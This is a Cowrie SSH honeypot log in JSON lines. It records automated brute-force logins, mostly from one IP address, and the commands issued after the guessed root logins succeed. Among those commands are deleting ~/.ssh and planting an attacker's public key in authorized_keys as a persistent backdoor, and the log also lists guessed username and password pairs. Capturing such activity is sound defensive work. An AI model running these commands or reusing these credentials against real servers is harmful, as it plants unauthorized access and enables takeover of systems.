{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:02.856730Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:02.994943Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.222162Z","src_ip":"212.227.235.229","session":"e55dfb09b95b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:03.352711Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.353910Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.495911Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.497032Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54602,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f18160f7a6","protocol":"ssh","message":"New connection: 212.227.235.229:54602 (1.2.3.4:22) [session: 36f18160f7a6]","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.633172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.634065Z","src_ip":"212.227.235.229","session":"36f18160f7a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:03.773340Z","src_ip":"212.227.235.229","session":"36f18160f7a6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:04.377515Z","src_ip":"212.227.235.229","session":"36f18160f7a6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:05.514208Z","src_ip":"212.227.235.229","session":"36f18160f7a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45930,"dst_ip":"1.2.3.4","dst_port":22,"session":"e720a3faf798","protocol":"ssh","message":"New connection: 212.227.235.229:45930 (1.2.3.4:22) [session: e720a3faf798]","sensor":"my-vps","timestamp":"2025-09-08T23:03:05.650147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:05.652834Z","src_ip":"212.227.235.229","session":"e720a3faf798"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:05.793622Z","src_ip":"212.227.235.229","session":"e720a3faf798"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:06.345957Z","src_ip":"212.227.235.229","session":"e720a3faf798"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:06.486143Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:06.487281Z","src_ip":"212.227.235.229","session":"e720a3faf798"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45812,"dst_ip":"1.2.3.4","dst_port":22,"session":"90119b1781a8","protocol":"ssh","message":"New connection: 212.227.235.229:45812 (1.2.3.4:22) [session: 90119b1781a8]","sensor":"my-vps","timestamp":"2025-09-08T23:03:06.764625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:06.765552Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:07.078714Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner12345$","message":"login attempt [root/hetzner12345$] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:08.333855Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:08.981431Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:08.982105Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:08.982999Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:09.298846Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:10.032160Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.032839Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.348876Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.349740Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45824,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ae3460bbc2a","protocol":"ssh","message":"New connection: 212.227.235.229:45824 (1.2.3.4:22) [session: 2ae3460bbc2a]","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.654711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.656163Z","src_ip":"212.227.235.229","session":"2ae3460bbc2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:10.962172Z","src_ip":"212.227.235.229","session":"2ae3460bbc2a"}
{"eventid":"cowrie.session.connect","src_ip":"8.137.121.98","src_port":50262,"dst_ip":"1.2.3.4","dst_port":22,"session":"930282b46781","protocol":"ssh","message":"New connection: 8.137.121.98:50262 (1.2.3.4:22) [session: 930282b46781]","sensor":"my-vps","timestamp":"2025-09-08T23:03:11.916101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:03:11.916772Z","src_ip":"8.137.121.98","session":"930282b46781"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:12.188729Z","src_ip":"212.227.235.229","session":"2ae3460bbc2a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T23:03:12.446877Z","src_ip":"8.137.121.98","session":"930282b46781"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41014,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ea3b0865a78","protocol":"ssh","message":"New connection: 212.227.235.229:41014 (1.2.3.4:22) [session: 9ea3b0865a78]","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.194103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.195473Z","src_ip":"212.227.235.229","session":"9ea3b0865a78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.431594Z","src_ip":"212.227.235.229","session":"9ea3b0865a78"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.497746Z","src_ip":"212.227.235.229","session":"2ae3460bbc2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58414,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb0295fc3ff7","protocol":"ssh","message":"New connection: 212.227.235.229:58414 (1.2.3.4:22) [session: eb0295fc3ff7]","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.799406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:13.800374Z","src_ip":"212.227.235.229","session":"eb0295fc3ff7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:14.103108Z","src_ip":"212.227.235.229","session":"eb0295fc3ff7"}
{"eventid":"cowrie.login.failed","username":"test2","password":"password123","message":"login attempt [test2/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:14.419013Z","src_ip":"212.227.235.229","session":"9ea3b0865a78"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:15.357764Z","src_ip":"212.227.235.229","session":"eb0295fc3ff7"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:15.657934Z","src_ip":"212.227.235.229","session":"9ea3b0865a78"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:15.662379Z","src_ip":"212.227.235.229","session":"90119b1781a8"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:15.663296Z","src_ip":"212.227.235.229","session":"eb0295fc3ff7"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:19.916971Z","src_ip":"8.137.121.98","session":"930282b46781"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37628,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c6b5ef460dc","protocol":"ssh","message":"New connection: 212.227.235.229:37628 (1.2.3.4:22) [session: 2c6b5ef460dc]","sensor":"my-vps","timestamp":"2025-09-08T23:03:21.927594Z"}
